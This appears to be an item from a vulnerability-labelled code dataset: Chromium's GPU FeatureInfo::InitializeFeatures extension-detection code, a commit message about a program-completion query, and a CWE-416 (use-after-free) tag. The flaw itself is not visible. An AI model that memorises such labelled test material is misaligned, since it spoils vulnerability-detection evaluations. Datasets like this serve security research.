gl::GLFence::IsGpuFenceSupported(); if (feature_flags_.chromium_gpu_fence) AddExtensionString("GL_CHROMIUM_gpu_fence"); feature_flags_.chromium_bind_generates_resource = gfx::HasExtension(extensions, "GL_CHROMIUM_bind_generates_resource"); feature_flags_.angle_webgl_compatibility = is_webgl_compatibility_context; feature_flags_.chromium_copy_texture = gfx::HasExtension(extensions, "GL_CHROMIUM_copy_texture"); feature_flags_.chromium_copy_compressed_texture = gfx::HasExtension(extensions, "GL_CHROMIUM_copy_compressed_texture"); feature_flags_.angle_client_arrays = gfx::HasExtension(extensions, "GL_ANGLE_client_arrays"); feature_flags_.angle_request_extension = gfx::HasExtension(extensions, "GL_ANGLE_request_extension"); feature_flags_.ext_debug_marker = gfx::HasExtension(extensions, "GL_EXT_debug_marker"); feature_flags_.arb_robustness = gfx::HasExtension(extensions, "GL_ARB_robustness"); feature_flags_.khr_robustness = gfx::HasExtension(extensions, "GL_KHR_robustness"); feature_flags_.ext_robustness = gfx::HasExtension(extensions, "GL_EXT_robustness"); feature_flags_.ext_pixel_buffer_object = gfx::HasExtension(extensions, "GL_ARB_pixel_buffer_object") || gfx::HasExtension(extensions, "GL_NV_pixel_buffer_object"); feature_flags_.ext_unpack_subimage = gfx::HasExtension(extensions, "GL_EXT_unpack_subimage"); feature_flags_.oes_rgb8_rgba8 = gfx::HasExtension(extensions, "GL_OES_rgb8_rgba8"); feature_flags_.angle_robust_resource_initialization = gfx::HasExtension(extensions, "GL_ANGLE_robust_resource_initialization"); feature_flags_.nv_fence = gfx::HasExtension(extensions, "GL_NV_fence"); feature_flags_.unpremultiply_and_dither_copy = !is_passthrough_cmd_decoder_; if (feature_flags_.unpremultiply_and_dither_copy) AddExtensionString("GL_CHROMIUM_unpremultiply_and_dither_copy"); feature_flags_.separate_stencil_ref_mask_writemask = !(gl_version_info_->is_d3d) && !IsWebGLContext(); if (gfx::HasExtension(extensions, "GL_MESA_framebuffer_flip_y")) { feature_flags_.mesa_framebuffer_flip_y = true; validators_.framebuffer_parameter.AddValue(GL_FRAMEBUFFER_FLIP_Y_MESA); AddExtensionString("GL_MESA_framebuffer_flip_y"); } if (is_passthrough_cmd_decoder_ && gfx::HasExtension(extensions, "GL_OVR_multiview2")) { AddExtensionString("GL_OVR_multiview2"); feature_flags_.ovr_multiview2 = true; } if (is_passthrough_cmd_decoder_ && gfx::HasExtension(extensions, "GL_KHR_parallel_shader_compile")) { AddExtensionString("GL_KHR_parallel_shader_compile"); feature_flags_.khr_parallel_shader_compile = true; validators_.g_l_state.AddValue(GL_MAX_SHADER_COMPILER_THREADS_KHR); validators_.shader_parameter.AddValue(GL_COMPLETION_STATUS_KHR); validators_.program_parameter.AddValue(GL_COMPLETION_STATUS_KHR); } if (gfx::HasExtension(extensions, "GL_KHR_robust_buffer_access_behavior")) { AddExtensionString("GL_KHR_robust_buffer_access_behavior"); feature_flags_.khr_robust_buffer_access_behavior = true; } if (!is_passthrough_cmd_decoder_ || gfx::HasExtension(extensions, "GL_ANGLE_multi_draw")) { feature_flags_.webgl_multi_draw = true; AddExtensionString("GL_WEBGL_multi_draw"); if (gfx::HasExtension(extensions, "GL_ANGLE_instanced_arrays") || feature_flags_.angle_instanced_arrays || gl_version_info_->is_es3 || gl_version_info_->is_desktop_core_profile) { feature_flags_.webgl_multi_draw_instanced = true; AddExtensionString("GL_WEBGL_multi_draw_instanced"); } } if (gfx::HasExtension(extensions, "GL_NV_internalformat_sample_query")) { feature_flags_.nv_internalformat_sample_query = true; } if (gfx::HasExtension(extensions, 
"GL_AMD_framebuffer_multisample_advanced")) { feature_flags_.amd_framebuffer_multisample_advanced = true; AddExtensionString("GL_AMD_framebuffer_multisample_advanced"); } } Commit Message: Add GL_PROGRAM_COMPLETION_QUERY_CHROMIUM This makes the query of GL_COMPLETION_STATUS_KHR to programs much cheaper by minimizing the round-trip to the GPU thread. Bug: 881152, 957001 Change-Id: Iadfa798af29225e752c710ca5c25f50b3dd3101a Reviewed-on: https://chromium-review.googlesource.com/c/chromium/src/+/1586630 Commit-Queue: Kenneth Russell <kbr@chromium.org> Reviewed-by: Kentaro Hara <haraken@chromium.org> Reviewed-by: Geoff Lang <geofflang@chromium.org> Reviewed-by: Kenneth Russell <kbr@chromium.org> Cr-Commit-Position: refs/heads/master@{#657568} CWE ID: CWE-416
void FeatureInfo::InitializeFeatures() { std::string extensions_string(gl::GetGLExtensionsFromCurrentContext()); gfx::ExtensionSet extensions(gfx::MakeExtensionSet(extensions_string)); const char* version_str = reinterpret_cast<const char*>(glGetString(GL_VERSION)); const char* renderer_str = reinterpret_cast<const char*>(glGetString(GL_RENDERER)); gl_version_info_.reset( new gl::GLVersionInfo(version_str, renderer_str, extensions)); bool enable_es3 = IsWebGL2OrES3OrHigherContext(); bool has_pixel_buffers = gl_version_info_->is_es3 || gl_version_info_->is_desktop_core_profile || gfx::HasExtension(extensions, "GL_ARB_pixel_buffer_object") || gfx::HasExtension(extensions, "GL_NV_pixel_buffer_object"); ScopedPixelUnpackBufferOverride scoped_pbo_override(has_pixel_buffers, 0); AddExtensionString("GL_ANGLE_translated_shader_source"); AddExtensionString("GL_CHROMIUM_async_pixel_transfers"); AddExtensionString("GL_CHROMIUM_bind_uniform_location"); AddExtensionString("GL_CHROMIUM_color_space_metadata"); AddExtensionString("GL_CHROMIUM_command_buffer_query"); AddExtensionString("GL_CHROMIUM_command_buffer_latency_query"); AddExtensionString("GL_CHROMIUM_copy_texture"); AddExtensionString("GL_CHROMIUM_deschedule"); AddExtensionString("GL_CHROMIUM_get_error_query"); AddExtensionString("GL_CHROMIUM_lose_context"); AddExtensionString("GL_CHROMIUM_pixel_transfer_buffer_object"); AddExtensionString("GL_CHROMIUM_rate_limit_offscreen_context"); AddExtensionString("GL_CHROMIUM_resize"); AddExtensionString("GL_CHROMIUM_resource_safe"); AddExtensionString("GL_CHROMIUM_strict_attribs"); AddExtensionString("GL_CHROMIUM_texture_mailbox"); AddExtensionString("GL_CHROMIUM_trace_marker"); AddExtensionString("GL_EXT_debug_marker"); AddExtensionString("GL_EXT_unpack_subimage"); AddExtensionString("GL_OES_vertex_array_object"); if (gfx::HasExtension(extensions, "GL_ANGLE_translated_shader_source")) { feature_flags_.angle_translated_shader_source = true; } bool enable_dxt1 = false; bool enable_dxt3 = false; bool enable_dxt5 = false; bool have_s3tc = gfx::HasExtension(extensions, "GL_EXT_texture_compression_s3tc"); bool have_dxt3 = have_s3tc || gfx::HasExtension(extensions, "GL_ANGLE_texture_compression_dxt3"); bool have_dxt5 = have_s3tc || gfx::HasExtension(extensions, "GL_ANGLE_texture_compression_dxt5"); if (gfx::HasExtension(extensions, "GL_EXT_texture_compression_dxt1") || gfx::HasExtension(extensions, "GL_ANGLE_texture_compression_dxt1") || have_s3tc) { enable_dxt1 = true; } if (have_dxt3) { enable_dxt3 = true; } if (have_dxt5) { enable_dxt5 = true; } if (enable_dxt1) { feature_flags_.ext_texture_format_dxt1 = true; AddExtensionString("GL_ANGLE_texture_compression_dxt1"); validators_.compressed_texture_format.AddValue( GL_COMPRESSED_RGB_S3TC_DXT1_EXT); validators_.compressed_texture_format.AddValue( GL_COMPRESSED_RGBA_S3TC_DXT1_EXT); validators_.texture_internal_format_storage.AddValue( GL_COMPRESSED_RGB_S3TC_DXT1_EXT); validators_.texture_internal_format_storage.AddValue( GL_COMPRESSED_RGBA_S3TC_DXT1_EXT); } if (enable_dxt3) { AddExtensionString("GL_ANGLE_texture_compression_dxt3"); validators_.compressed_texture_format.AddValue( GL_COMPRESSED_RGBA_S3TC_DXT3_EXT); validators_.texture_internal_format_storage.AddValue( GL_COMPRESSED_RGBA_S3TC_DXT3_EXT); } if (enable_dxt5) { feature_flags_.ext_texture_format_dxt5 = true; AddExtensionString("GL_ANGLE_texture_compression_dxt5"); validators_.compressed_texture_format.AddValue( GL_COMPRESSED_RGBA_S3TC_DXT5_EXT); validators_.texture_internal_format_storage.AddValue( 
GL_COMPRESSED_RGBA_S3TC_DXT5_EXT); } bool have_astc = gfx::HasExtension(extensions, "GL_KHR_texture_compression_astc_ldr"); if (have_astc) { feature_flags_.ext_texture_format_astc = true; AddExtensionString("GL_KHR_texture_compression_astc_ldr"); GLint astc_format_it = GL_COMPRESSED_RGBA_ASTC_4x4_KHR; GLint astc_format_max = GL_COMPRESSED_RGBA_ASTC_12x12_KHR; for (; astc_format_it <= astc_format_max; astc_format_it++) { validators_.compressed_texture_format.AddValue(astc_format_it); validators_.texture_internal_format_storage.AddValue(astc_format_it); } astc_format_it = GL_COMPRESSED_SRGB8_ALPHA8_ASTC_4x4_KHR; astc_format_max = GL_COMPRESSED_SRGB8_ALPHA8_ASTC_12x12_KHR; for (; astc_format_it <= astc_format_max; astc_format_it++) { validators_.compressed_texture_format.AddValue(astc_format_it); validators_.texture_internal_format_storage.AddValue(astc_format_it); } } bool have_atc = gfx::HasExtension(extensions, "GL_AMD_compressed_ATC_texture") || gfx::HasExtension(extensions, "GL_ATI_texture_compression_atitc"); if (have_atc) { feature_flags_.ext_texture_format_atc = true; AddExtensionString("GL_AMD_compressed_ATC_texture"); validators_.compressed_texture_format.AddValue(GL_ATC_RGB_AMD); validators_.compressed_texture_format.AddValue( GL_ATC_RGBA_INTERPOLATED_ALPHA_AMD); validators_.texture_internal_format_storage.AddValue(GL_ATC_RGB_AMD); validators_.texture_internal_format_storage.AddValue( GL_ATC_RGBA_INTERPOLATED_ALPHA_AMD); } if (gfx::HasExtension(extensions, "GL_EXT_texture_filter_anisotropic")) { AddExtensionString("GL_EXT_texture_filter_anisotropic"); validators_.texture_parameter.AddValue(GL_TEXTURE_MAX_ANISOTROPY_EXT); validators_.g_l_state.AddValue(GL_MAX_TEXTURE_MAX_ANISOTROPY_EXT); } bool enable_depth_texture = false; GLenum depth_texture_format = GL_NONE; if (!workarounds_.disable_depth_texture && (gfx::HasExtension(extensions, "GL_ARB_depth_texture") || gfx::HasExtension(extensions, "GL_OES_depth_texture") || gfx::HasExtension(extensions, "GL_ANGLE_depth_texture") || gl_version_info_->is_desktop_core_profile)) { enable_depth_texture = true; depth_texture_format = GL_DEPTH_COMPONENT; feature_flags_.angle_depth_texture = gfx::HasExtension(extensions, "GL_ANGLE_depth_texture"); } if (enable_depth_texture) { AddExtensionString("GL_CHROMIUM_depth_texture"); AddExtensionString("GL_GOOGLE_depth_texture"); validators_.texture_internal_format.AddValue(GL_DEPTH_COMPONENT); validators_.texture_format.AddValue(GL_DEPTH_COMPONENT); validators_.pixel_type.AddValue(GL_UNSIGNED_SHORT); validators_.pixel_type.AddValue(GL_UNSIGNED_INT); validators_.texture_depth_renderable_internal_format.AddValue( GL_DEPTH_COMPONENT); } GLenum depth_stencil_texture_format = GL_NONE; if (gfx::HasExtension(extensions, "GL_EXT_packed_depth_stencil") || gfx::HasExtension(extensions, "GL_OES_packed_depth_stencil") || gl_version_info_->is_es3 || gl_version_info_->is_desktop_core_profile) { AddExtensionString("GL_OES_packed_depth_stencil"); feature_flags_.packed_depth24_stencil8 = true; if (enable_depth_texture) { if (gl_version_info_->is_es3) { depth_stencil_texture_format = GL_DEPTH24_STENCIL8; } else { depth_stencil_texture_format = GL_DEPTH_STENCIL; } validators_.texture_internal_format.AddValue(GL_DEPTH_STENCIL); validators_.texture_format.AddValue(GL_DEPTH_STENCIL); validators_.pixel_type.AddValue(GL_UNSIGNED_INT_24_8); validators_.texture_depth_renderable_internal_format.AddValue( GL_DEPTH_STENCIL); validators_.texture_stencil_renderable_internal_format.AddValue( GL_DEPTH_STENCIL); } 
validators_.render_buffer_format.AddValue(GL_DEPTH24_STENCIL8); if (context_type_ == CONTEXT_TYPE_WEBGL1) { validators_.attachment.AddValue(GL_DEPTH_STENCIL_ATTACHMENT); validators_.attachment_query.AddValue(GL_DEPTH_STENCIL_ATTACHMENT); } } if (gl_version_info_->is_es3 || gl_version_info_->is_desktop_core_profile || gfx::HasExtension(extensions, "GL_OES_vertex_array_object") || gfx::HasExtension(extensions, "GL_ARB_vertex_array_object") || gfx::HasExtension(extensions, "GL_APPLE_vertex_array_object")) { feature_flags_.native_vertex_array_object = true; } if (workarounds_.use_client_side_arrays_for_stream_buffers) { feature_flags_.native_vertex_array_object = false; } if (gl_version_info_->is_es3 || gfx::HasExtension(extensions, "GL_OES_element_index_uint") || gl::HasDesktopGLFeatures()) { AddExtensionString("GL_OES_element_index_uint"); validators_.index_type.AddValue(GL_UNSIGNED_INT); } bool has_srgb_framebuffer_support = false; if (gl_version_info_->IsAtLeastGL(3, 2) || (gl_version_info_->IsAtLeastGL(2, 0) && (gfx::HasExtension(extensions, "GL_EXT_framebuffer_sRGB") || gfx::HasExtension(extensions, "GL_ARB_framebuffer_sRGB")))) { feature_flags_.desktop_srgb_support = true; has_srgb_framebuffer_support = true; } if ((((gl_version_info_->is_es3 || gfx::HasExtension(extensions, "GL_OES_rgb8_rgba8")) && gfx::HasExtension(extensions, "GL_EXT_sRGB")) || feature_flags_.desktop_srgb_support) && IsWebGL1OrES2Context()) { feature_flags_.ext_srgb = true; AddExtensionString("GL_EXT_sRGB"); validators_.texture_internal_format.AddValue(GL_SRGB_EXT); validators_.texture_internal_format.AddValue(GL_SRGB_ALPHA_EXT); validators_.texture_format.AddValue(GL_SRGB_EXT); validators_.texture_format.AddValue(GL_SRGB_ALPHA_EXT); validators_.render_buffer_format.AddValue(GL_SRGB8_ALPHA8_EXT); validators_.framebuffer_attachment_parameter.AddValue( GL_FRAMEBUFFER_ATTACHMENT_COLOR_ENCODING_EXT); validators_.texture_unsized_internal_format.AddValue(GL_SRGB_EXT); validators_.texture_unsized_internal_format.AddValue(GL_SRGB_ALPHA_EXT); has_srgb_framebuffer_support = true; } if (gl_version_info_->is_es3) has_srgb_framebuffer_support = true; if (has_srgb_framebuffer_support && !IsWebGLContext()) { if (feature_flags_.desktop_srgb_support || gfx::HasExtension(extensions, "GL_EXT_sRGB_write_control")) { feature_flags_.ext_srgb_write_control = true; AddExtensionString("GL_EXT_sRGB_write_control"); validators_.capability.AddValue(GL_FRAMEBUFFER_SRGB_EXT); } } if (gfx::HasExtension(extensions, "GL_EXT_texture_sRGB_decode") && !IsWebGLContext()) { AddExtensionString("GL_EXT_texture_sRGB_decode"); validators_.texture_parameter.AddValue(GL_TEXTURE_SRGB_DECODE_EXT); } bool have_s3tc_srgb = false; if (gl_version_info_->is_es) { have_s3tc_srgb = gfx::HasExtension(extensions, "GL_NV_sRGB_formats") || gfx::HasExtension(extensions, "GL_EXT_texture_compression_s3tc_srgb"); } else { if (gfx::HasExtension(extensions, "GL_EXT_texture_sRGB") || gl_version_info_->IsAtLeastGL(4, 1)) { have_s3tc_srgb = gfx::HasExtension(extensions, "GL_EXT_texture_compression_s3tc"); } } if (have_s3tc_srgb) { AddExtensionString("GL_EXT_texture_compression_s3tc_srgb"); validators_.compressed_texture_format.AddValue( GL_COMPRESSED_SRGB_S3TC_DXT1_EXT); validators_.compressed_texture_format.AddValue( GL_COMPRESSED_SRGB_ALPHA_S3TC_DXT1_EXT); validators_.compressed_texture_format.AddValue( GL_COMPRESSED_SRGB_ALPHA_S3TC_DXT3_EXT); validators_.compressed_texture_format.AddValue( GL_COMPRESSED_SRGB_ALPHA_S3TC_DXT5_EXT); 
validators_.texture_internal_format_storage.AddValue( GL_COMPRESSED_SRGB_S3TC_DXT1_EXT); validators_.texture_internal_format_storage.AddValue( GL_COMPRESSED_SRGB_ALPHA_S3TC_DXT1_EXT); validators_.texture_internal_format_storage.AddValue( GL_COMPRESSED_SRGB_ALPHA_S3TC_DXT3_EXT); validators_.texture_internal_format_storage.AddValue( GL_COMPRESSED_SRGB_ALPHA_S3TC_DXT5_EXT); } bool has_apple_bgra = gfx::HasExtension(extensions, "GL_APPLE_texture_format_BGRA8888"); bool has_ext_bgra = gfx::HasExtension(extensions, "GL_EXT_texture_format_BGRA8888"); bool enable_texture_format_bgra8888 = has_ext_bgra || has_apple_bgra || !gl_version_info_->is_es; bool has_ext_texture_storage = gfx::HasExtension(extensions, "GL_EXT_texture_storage"); bool has_arb_texture_storage = gfx::HasExtension(extensions, "GL_ARB_texture_storage"); bool has_texture_storage = !workarounds_.disable_texture_storage && (has_ext_texture_storage || has_arb_texture_storage || gl_version_info_->is_es3 || gl_version_info_->IsAtLeastGL(4, 2)); bool enable_texture_storage = has_texture_storage; bool texture_storage_incompatible_with_bgra = gl_version_info_->is_es3 && !has_ext_texture_storage && !has_apple_bgra; if (texture_storage_incompatible_with_bgra && enable_texture_format_bgra8888 && enable_texture_storage) { switch (context_type_) { case CONTEXT_TYPE_OPENGLES2: enable_texture_storage = false; break; case CONTEXT_TYPE_OPENGLES3: enable_texture_format_bgra8888 = false; break; case CONTEXT_TYPE_WEBGL1: case CONTEXT_TYPE_WEBGL2: case CONTEXT_TYPE_WEBGL2_COMPUTE: case CONTEXT_TYPE_WEBGPU: break; } } if (enable_texture_storage) { feature_flags_.ext_texture_storage = true; AddExtensionString("GL_EXT_texture_storage"); validators_.texture_parameter.AddValue(GL_TEXTURE_IMMUTABLE_FORMAT_EXT); } if (enable_texture_format_bgra8888) { feature_flags_.ext_texture_format_bgra8888 = true; AddExtensionString("GL_EXT_texture_format_BGRA8888"); validators_.texture_internal_format.AddValue(GL_BGRA_EXT); validators_.texture_format.AddValue(GL_BGRA_EXT); validators_.texture_unsized_internal_format.AddValue(GL_BGRA_EXT); validators_.texture_internal_format_storage.AddValue(GL_BGRA8_EXT); validators_.texture_sized_color_renderable_internal_format.AddValue( GL_BGRA8_EXT); validators_.texture_sized_texture_filterable_internal_format.AddValue( GL_BGRA8_EXT); feature_flags_.gpu_memory_buffer_formats.Add(gfx::BufferFormat::BGRA_8888); feature_flags_.gpu_memory_buffer_formats.Add(gfx::BufferFormat::BGRX_8888); } bool enable_render_buffer_bgra = gl_version_info_->is_angle || !gl_version_info_->is_es; if (enable_render_buffer_bgra) { feature_flags_.ext_render_buffer_format_bgra8888 = true; AddExtensionString("GL_CHROMIUM_renderbuffer_format_BGRA8888"); validators_.render_buffer_format.AddValue(GL_BGRA8_EXT); } bool enable_read_format_bgra = gfx::HasExtension(extensions, "GL_EXT_read_format_bgra") || !gl_version_info_->is_es; if (enable_read_format_bgra) { feature_flags_.ext_read_format_bgra = true; AddExtensionString("GL_EXT_read_format_bgra"); validators_.read_pixel_format.AddValue(GL_BGRA_EXT); } feature_flags_.arb_es3_compatibility = gfx::HasExtension(extensions, "GL_ARB_ES3_compatibility") && !gl_version_info_->is_es; feature_flags_.ext_disjoint_timer_query = gfx::HasExtension(extensions, "GL_EXT_disjoint_timer_query"); if (feature_flags_.ext_disjoint_timer_query || gfx::HasExtension(extensions, "GL_ARB_timer_query") || gfx::HasExtension(extensions, "GL_EXT_timer_query")) { AddExtensionString("GL_EXT_disjoint_timer_query"); } if 
(gfx::HasExtension(extensions, "GL_OES_rgb8_rgba8") || gl::HasDesktopGLFeatures()) { AddExtensionString("GL_OES_rgb8_rgba8"); validators_.render_buffer_format.AddValue(GL_RGB8_OES); validators_.render_buffer_format.AddValue(GL_RGBA8_OES); } if (!disallowed_features_.npot_support && (gl_version_info_->is_es3 || gl_version_info_->is_desktop_core_profile || gfx::HasExtension(extensions, "GL_ARB_texture_non_power_of_two") || gfx::HasExtension(extensions, "GL_OES_texture_npot"))) { AddExtensionString("GL_OES_texture_npot"); feature_flags_.npot_ok = true; } InitializeFloatAndHalfFloatFeatures(extensions); if (!workarounds_.disable_chromium_framebuffer_multisample) { bool ext_has_multisample = gfx::HasExtension(extensions, "GL_ARB_framebuffer_object") || (gfx::HasExtension(extensions, "GL_EXT_framebuffer_multisample") && gfx::HasExtension(extensions, "GL_EXT_framebuffer_blit")) || gl_version_info_->is_es3 || gl_version_info_->is_desktop_core_profile; if (gl_version_info_->is_angle || gl_version_info_->is_swiftshader) { ext_has_multisample |= gfx::HasExtension(extensions, "GL_ANGLE_framebuffer_multisample"); } if (ext_has_multisample) { feature_flags_.chromium_framebuffer_multisample = true; validators_.framebuffer_target.AddValue(GL_READ_FRAMEBUFFER_EXT); validators_.framebuffer_target.AddValue(GL_DRAW_FRAMEBUFFER_EXT); validators_.g_l_state.AddValue(GL_READ_FRAMEBUFFER_BINDING_EXT); validators_.g_l_state.AddValue(GL_MAX_SAMPLES_EXT); validators_.render_buffer_parameter.AddValue(GL_RENDERBUFFER_SAMPLES_EXT); AddExtensionString("GL_CHROMIUM_framebuffer_multisample"); } } if (gfx::HasExtension(extensions, "GL_EXT_multisampled_render_to_texture")) { feature_flags_.multisampled_render_to_texture = true; } else if (gfx::HasExtension(extensions, "GL_IMG_multisampled_render_to_texture")) { feature_flags_.multisampled_render_to_texture = true; feature_flags_.use_img_for_multisampled_render_to_texture = true; } if (feature_flags_.multisampled_render_to_texture) { validators_.render_buffer_parameter.AddValue(GL_RENDERBUFFER_SAMPLES_EXT); validators_.g_l_state.AddValue(GL_MAX_SAMPLES_EXT); validators_.framebuffer_attachment_parameter.AddValue( GL_FRAMEBUFFER_ATTACHMENT_TEXTURE_SAMPLES_EXT); AddExtensionString("GL_EXT_multisampled_render_to_texture"); } if (!gl_version_info_->is_es || gfx::HasExtension(extensions, "GL_EXT_multisample_compatibility")) { AddExtensionString("GL_EXT_multisample_compatibility"); feature_flags_.ext_multisample_compatibility = true; validators_.capability.AddValue(GL_MULTISAMPLE_EXT); validators_.capability.AddValue(GL_SAMPLE_ALPHA_TO_ONE_EXT); } if (gfx::HasExtension(extensions, "GL_INTEL_framebuffer_CMAA")) { feature_flags_.chromium_screen_space_antialiasing = true; AddExtensionString("GL_CHROMIUM_screen_space_antialiasing"); } else if (gl_version_info_->IsAtLeastGLES(3, 1) || (gl_version_info_->IsAtLeastGL(3, 0) && gfx::HasExtension(extensions, "GL_ARB_shading_language_420pack") && gfx::HasExtension(extensions, "GL_ARB_texture_storage") && gfx::HasExtension(extensions, "GL_ARB_texture_gather") && gfx::HasExtension(extensions, "GL_ARB_explicit_uniform_location") && gfx::HasExtension(extensions, "GL_ARB_explicit_attrib_location") && gfx::HasExtension(extensions, "GL_ARB_shader_image_load_store"))) { feature_flags_.chromium_screen_space_antialiasing = true; feature_flags_.use_chromium_screen_space_antialiasing_via_shaders = true; AddExtensionString("GL_CHROMIUM_screen_space_antialiasing"); } if (gfx::HasExtension(extensions, "GL_OES_depth24") || gl::HasDesktopGLFeatures() || 
gl_version_info_->is_es3) { AddExtensionString("GL_OES_depth24"); feature_flags_.oes_depth24 = true; validators_.render_buffer_format.AddValue(GL_DEPTH_COMPONENT24); } if (gl_version_info_->is_es3 || gfx::HasExtension(extensions, "GL_OES_standard_derivatives") || gl::HasDesktopGLFeatures()) { AddExtensionString("GL_OES_standard_derivatives"); feature_flags_.oes_standard_derivatives = true; validators_.hint_target.AddValue(GL_FRAGMENT_SHADER_DERIVATIVE_HINT_OES); validators_.g_l_state.AddValue(GL_FRAGMENT_SHADER_DERIVATIVE_HINT_OES); } if (gfx::HasExtension(extensions, "GL_CHROMIUM_texture_filtering_hint")) { AddExtensionString("GL_CHROMIUM_texture_filtering_hint"); feature_flags_.chromium_texture_filtering_hint = true; validators_.hint_target.AddValue(GL_TEXTURE_FILTERING_HINT_CHROMIUM); validators_.g_l_state.AddValue(GL_TEXTURE_FILTERING_HINT_CHROMIUM); } if (gfx::HasExtension(extensions, "GL_OES_EGL_image_external")) { AddExtensionString("GL_OES_EGL_image_external"); feature_flags_.oes_egl_image_external = true; } if (gfx::HasExtension(extensions, "GL_NV_EGL_stream_consumer_external")) { AddExtensionString("GL_NV_EGL_stream_consumer_external"); feature_flags_.nv_egl_stream_consumer_external = true; } if (feature_flags_.oes_egl_image_external || feature_flags_.nv_egl_stream_consumer_external) { validators_.texture_bind_target.AddValue(GL_TEXTURE_EXTERNAL_OES); validators_.get_tex_param_target.AddValue(GL_TEXTURE_EXTERNAL_OES); validators_.texture_parameter.AddValue(GL_REQUIRED_TEXTURE_IMAGE_UNITS_OES); validators_.g_l_state.AddValue(GL_TEXTURE_BINDING_EXTERNAL_OES); } if (gfx::HasExtension(extensions, "GL_OES_compressed_ETC1_RGB8_texture") && !gl_version_info_->is_angle) { AddExtensionString("GL_OES_compressed_ETC1_RGB8_texture"); feature_flags_.oes_compressed_etc1_rgb8_texture = true; validators_.compressed_texture_format.AddValue(GL_ETC1_RGB8_OES); validators_.texture_internal_format_storage.AddValue(GL_ETC1_RGB8_OES); } if (gfx::HasExtension(extensions, "GL_CHROMIUM_compressed_texture_etc") || (gl_version_info_->is_es3 && !gl_version_info_->is_angle)) { AddExtensionString("GL_CHROMIUM_compressed_texture_etc"); validators_.UpdateETCCompressedTextureFormats(); } if (gfx::HasExtension(extensions, "GL_AMD_compressed_ATC_texture")) { AddExtensionString("GL_AMD_compressed_ATC_texture"); validators_.compressed_texture_format.AddValue(GL_ATC_RGB_AMD); validators_.compressed_texture_format.AddValue( GL_ATC_RGBA_EXPLICIT_ALPHA_AMD); validators_.compressed_texture_format.AddValue( GL_ATC_RGBA_INTERPOLATED_ALPHA_AMD); validators_.texture_internal_format_storage.AddValue(GL_ATC_RGB_AMD); validators_.texture_internal_format_storage.AddValue( GL_ATC_RGBA_EXPLICIT_ALPHA_AMD); validators_.texture_internal_format_storage.AddValue( GL_ATC_RGBA_INTERPOLATED_ALPHA_AMD); } if (gfx::HasExtension(extensions, "GL_IMG_texture_compression_pvrtc")) { AddExtensionString("GL_IMG_texture_compression_pvrtc"); validators_.compressed_texture_format.AddValue( GL_COMPRESSED_RGB_PVRTC_4BPPV1_IMG); validators_.compressed_texture_format.AddValue( GL_COMPRESSED_RGB_PVRTC_2BPPV1_IMG); validators_.compressed_texture_format.AddValue( GL_COMPRESSED_RGBA_PVRTC_4BPPV1_IMG); validators_.compressed_texture_format.AddValue( GL_COMPRESSED_RGBA_PVRTC_2BPPV1_IMG); validators_.texture_internal_format_storage.AddValue( GL_COMPRESSED_RGB_PVRTC_4BPPV1_IMG); validators_.texture_internal_format_storage.AddValue( GL_COMPRESSED_RGB_PVRTC_2BPPV1_IMG); validators_.texture_internal_format_storage.AddValue( GL_COMPRESSED_RGBA_PVRTC_4BPPV1_IMG); 
validators_.texture_internal_format_storage.AddValue( GL_COMPRESSED_RGBA_PVRTC_2BPPV1_IMG); } if (gfx::HasExtension(extensions, "GL_ARB_texture_rectangle") || gfx::HasExtension(extensions, "GL_ANGLE_texture_rectangle") || gl_version_info_->is_desktop_core_profile) { AddExtensionString("GL_ARB_texture_rectangle"); feature_flags_.arb_texture_rectangle = true; validators_.texture_bind_target.AddValue(GL_TEXTURE_RECTANGLE_ARB); validators_.texture_target.AddValue(GL_TEXTURE_RECTANGLE_ARB); validators_.get_tex_param_target.AddValue(GL_TEXTURE_RECTANGLE_ARB); validators_.g_l_state.AddValue(GL_TEXTURE_BINDING_RECTANGLE_ARB); } #if defined(OS_MACOSX) || defined(OS_CHROMEOS) AddExtensionString("GL_CHROMIUM_ycbcr_420v_image"); feature_flags_.chromium_image_ycbcr_420v = true; #endif if (feature_flags_.chromium_image_ycbcr_420v) { feature_flags_.gpu_memory_buffer_formats.Add( gfx::BufferFormat::YUV_420_BIPLANAR); } if (gfx::HasExtension(extensions, "GL_APPLE_ycbcr_422")) { AddExtensionString("GL_CHROMIUM_ycbcr_422_image"); feature_flags_.chromium_image_ycbcr_422 = true; feature_flags_.gpu_memory_buffer_formats.Add(gfx::BufferFormat::UYVY_422); } #if defined(OS_MACOSX) feature_flags_.chromium_image_xr30 = base::mac::IsAtLeastOS10_13(); #elif !defined(OS_WIN) feature_flags_.chromium_image_xb30 = gl_version_info_->IsAtLeastGL(3, 3) || gl_version_info_->IsAtLeastGLES(3, 0) || gfx::HasExtension(extensions, "GL_EXT_texture_type_2_10_10_10_REV"); #endif if (feature_flags_.chromium_image_xr30 || feature_flags_.chromium_image_xb30) { validators_.texture_internal_format.AddValue(GL_RGB10_A2_EXT); validators_.render_buffer_format.AddValue(GL_RGB10_A2_EXT); validators_.texture_internal_format_storage.AddValue(GL_RGB10_A2_EXT); validators_.pixel_type.AddValue(GL_UNSIGNED_INT_2_10_10_10_REV); } if (feature_flags_.chromium_image_xr30) { feature_flags_.gpu_memory_buffer_formats.Add( gfx::BufferFormat::BGRX_1010102); } if (feature_flags_.chromium_image_xb30) { feature_flags_.gpu_memory_buffer_formats.Add( gfx::BufferFormat::RGBX_1010102); } if (gfx::HasExtension(extensions, "GL_ANGLE_texture_usage")) { feature_flags_.angle_texture_usage = true; AddExtensionString("GL_ANGLE_texture_usage"); validators_.texture_parameter.AddValue(GL_TEXTURE_USAGE_ANGLE); } bool have_occlusion_query = gl_version_info_->IsAtLeastGLES(3, 0) || gl_version_info_->IsAtLeastGL(3, 3); bool have_ext_occlusion_query_boolean = gfx::HasExtension(extensions, "GL_EXT_occlusion_query_boolean"); bool have_arb_occlusion_query2 = gfx::HasExtension(extensions, "GL_ARB_occlusion_query2"); bool have_arb_occlusion_query = (gl_version_info_->is_desktop_core_profile && gl_version_info_->IsAtLeastGL(1, 5)) || gfx::HasExtension(extensions, "GL_ARB_occlusion_query"); if (have_occlusion_query || have_ext_occlusion_query_boolean || have_arb_occlusion_query2 || have_arb_occlusion_query) { feature_flags_.occlusion_query = have_arb_occlusion_query; if (context_type_ == CONTEXT_TYPE_OPENGLES2) { AddExtensionString("GL_EXT_occlusion_query_boolean"); } feature_flags_.occlusion_query_boolean = true; feature_flags_.use_arb_occlusion_query2_for_occlusion_query_boolean = !have_ext_occlusion_query_boolean && (have_arb_occlusion_query2 || (gl_version_info_->IsAtLeastGL(3, 3) && gl_version_info_->IsLowerThanGL(4, 3))); feature_flags_.use_arb_occlusion_query_for_occlusion_query_boolean = 